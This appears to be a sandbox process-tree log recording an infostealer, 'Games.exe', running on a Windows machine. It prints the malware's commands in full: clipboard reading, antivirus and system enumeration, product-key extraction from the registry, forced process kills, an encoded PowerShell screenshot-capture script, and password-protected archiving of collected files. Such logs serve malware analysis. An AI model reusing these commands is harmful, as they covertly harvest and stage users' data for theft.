        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:2040
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:5436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:5136
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:5492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5164
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5196
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:5276
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:5532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:5320
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5616
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ibadf1q3\ibadf1q3.cmdline"
        6⤵
        
        PID:6016
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA3A9.tmp" "c:\Users\Admin\AppData\Local\Temp\ibadf1q3\CSC99366D26D008494D9A16F1F245651878.TMP"
        7⤵
        
        PID:6088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5648
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5884
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5972
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6096
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5488
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 540"
      4⤵
      PID:5124
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 540
        5⤵
        Kills process with taskkill
        
        PID:5856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4912"
      4⤵
      PID:5548
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4912
        5⤵
        Kills process with taskkill
        
        PID:5492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2476"
      4⤵
      PID:5136
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2476
        5⤵
        Kills process with taskkill
        
        PID:6052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 376"
      4⤵
      PID:6040
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 376
        5⤵
        Kills process with taskkill
        
        PID:2036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4984"
      4⤵
      PID:5476
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4984
        5⤵
        Kills process with taskkill
        
        PID:5472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2648"
      4⤵
      PID:2988
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5196
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2648
        5⤵
        Kills process with taskkill
        
        PID:2380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4780"
      4⤵
      PID:4720
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4780
        5⤵
        Kills process with taskkill
        
        PID:5784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1192"
      4⤵
      PID:5696
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1192
        5⤵
        Kills process with taskkill
        
        PID:6016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3724"
      4⤵
      PID:5340
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3724
        5⤵
        Kills process with taskkill
        
        PID:3076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4064"
      4⤵
      PID:5700
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4064
        5⤵
        Kills process with taskkill
        
        PID:768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 672"
      4⤵
      PID:5808
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 672
        5⤵
        Kills process with taskkill
        
        PID:5508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:5712
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:5216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44962\rar.exe a -r -hp"10241317" "C:\Users\Admin\AppData\Local\Temp\DJpy6.zip" *"
      4⤵
      PID:1348
    - - C:\Users\Admin\AppData\Local\Temp\_MEI44962\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI44962\rar.exe a -r -hp"10241317" "C:\Users\Admin\AppData\Local\Temp\DJpy6.zip" *
        5⤵
        Executes dropped EXE
        
        PID:2052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:6000
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:5964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:1244
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:100
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:4244
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4396
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:5988
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3844

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2252

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:6088

C:\Users\Admin\Downloads\Games.exe
"C:\Users\Admin\Downloads\Games.exe"
1⤵
- Executes dropped EXE
PID:5764
- C:\Users\Admin\Downloads\Games.exe
  "C:\Users\Admin\Downloads\Games.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3224

C:\Users\Admin\Downloads\Games.exe
"C:\Users\Admin\Downloads\Games.exe"
1⤵
- Executes dropped EXE
PID:5912
- C:\Users\Admin\Downloads\Games.exe
  "C:\Users\Admin\Downloads\Games.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4576

C:\Users\Admin\Downloads\Games.exe
"C:\Users\Admin\Downloads\Games.exe"
1⤵
- Executes dropped EXE
PID:1652
- C:\Users\Admin\Downloads\Games.exe
  "C:\Users\Admin\Downloads\Games.exe"
  2⤵
  - Executes dropped EXE
  PID:60

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4856
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:220
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1888 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1700de9-7e38-4258-83c8-72ffdb5dc4b7} 220 "\\.\pipe\gecko-crash-server-pipe.220" gpu
    3⤵
    PID:5356
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37f4ec3f-a093-4379-88d2-c0432b81af5f} 220 "\\.\pipe\gecko-crash-server-pipe.220" socket
    3⤵
    - Checks processor information in registry
    PID:5500
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3240 -childID 1 -isForBrowser -prefsHandle 2896 -prefMapHandle 1388 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f285ca5-0193-4d63-8457-1b0b2d946726} 220 "\\.\pipe\gecko-crash-server-pipe.220" tab
    3⤵
    PID:4728
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4072 -childID 2 -isForBrowser -prefsHandle 4020 -prefMapHandle 4012 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dcb47df7-68a8-4cf8-8b68-1cbe804779dc} 220 "\\.\pipe\gecko-crash-server-pipe.220" tab
    3⤵
    PID:2136
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5052 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4828 -prefMapHandle 4932 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a58d579-1e04-4136-9729-131bc22628ec} 220 "\\.\pipe\gecko-crash-server-pipe.220" utility
    3⤵
    - Checks processor information in registry
    PID:3912
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5412 -childID 3 -isForBrowser -prefsHandle 5392 -prefMapHandle 5404 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ae8f4cf-b5ce-4c67-a379-b020f0f31e75} 220 "\\.\pipe\gecko-crash-server-pipe.220" tab
    3⤵
    PID:3892
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 4 -isForBrowser -prefsHandle 5552 -prefMapHandle 5556 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {357720e8-b36b-429e-80bb-a7f5a826af7a} 220 "\\.\pipe\gecko-crash-server-pipe.220" tab
    3⤵
    PID:6024
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5824 -childID 5 -isForBrowser -prefsHandle 5744 -prefMapHandle 5748 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ec70e55-a8b0-43c6-b805-597537e16c14} 220 "\\.\pipe\gecko-crash-server-pipe.220" tab
    3⤵
    PID:1188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa20f5cc40,0x7ffa20f5cc4c,0x7ffa20f5cc58
  2⤵
  PID:684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1868,i,14874993150180877069,11751949234753087712,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:2
  2⤵
